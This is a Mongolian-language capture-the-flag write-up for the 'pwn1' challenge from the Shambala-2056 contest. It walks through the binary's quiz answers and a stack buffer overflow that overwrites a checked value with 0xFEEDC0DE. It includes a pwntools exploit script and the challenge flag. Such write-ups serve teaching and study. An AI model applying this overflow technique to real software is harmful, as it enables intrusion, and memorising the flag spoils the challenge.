🇦🇷Argentina-PWN (pwn1)

Shambala-2056 урлаг технологийн наадам дээрх бөх барилдаан буюу CTF тэмцээний даалгавруудын талаар оруулж байна

Энэхүү pwn төрлийн даалгавар нь Аргентин улс дээр байршиж байсан. Хэрвээ та бүхэн татаж туршиж үзэхийг хүсвэл доор холбоосыг нь үлдээлээ

15KB

pwn1

Disassemblerwith IDA pro

Хамгийн эхний validation бол 1. Eriin guvan naadmiin hamgiin hurdan ni?

Энэхүү асуултын хариулт нь Hurdanm0ri esvel num sum ch yumuu

Энэ хэсгийг кодоор бичиж илгээхдээ sendline ашиглаж болно

io.sendline(bytes("Hurdanm0ri esvel num sum ch yumuu",'utf-8'))
data=io.recv()

Хэрвээ энэхүү үйлдэл нь буруу байвал bishiiim bn shu гэж хэвлэнэ зөв байвал дараагийн асуултруу шилжинэ

2. chinggis haani dagavar huuhdiin ehneriin eejiin ner? гэсэн асуултад za bi uuuuuruuuuuuuu ch medkue гэж хариулвал зөв гэж үзнэ

Буруу хариулвал bishiiim bn shu гэж хэвлээд зөв байвал дараагийн асуулт буюу tegvel minii password yuiin?-руу очно

Одоо бидэнд нууц үгийг олох шаардлага үүсэж байгаа юм. Энэхүү кодыг анализ хийж үзвэл. cmp --> compare хийж байгаа хэсэгт 0FEEDC0DEh гэж бичсэн байгааг харж болно

Энэхүү утгаа хэрвээ серверлүү зөв дамжуулвал бид серверээс амжилттай флагаа авах боломж бүрдэнэ. Энэхүү үйлдлүүдийг автоматжуулаад скрипт болгоод үзье

#!/usr/bin/env python3
from pwn import *
#host='54.227.92.4'
#port=3001
#io=remote(host,port)
io=process("./pwn1")
data=io.recvline()
print(data)
io.sendline(bytes("Hurdanm0ri esvel num sum ch yumuu",'utf-8'))
data=io.recv()
print(data)
io.sendline(bytes("za bi uuuuruuuuuu ch medkue",'utf-8'))
data=io.recv()
print(data)
io.sendline(b"A"*43+b"\xde\xc0\xed\xfe")
data=io.recv()
print(data)

Код дээрээ яагаад "A"*43 гэсэн бэ гэхээр массивын утгаас харахад бүх зүйл тодорхой болно

shambala2056{n0_pwn_n0_funN!_albania}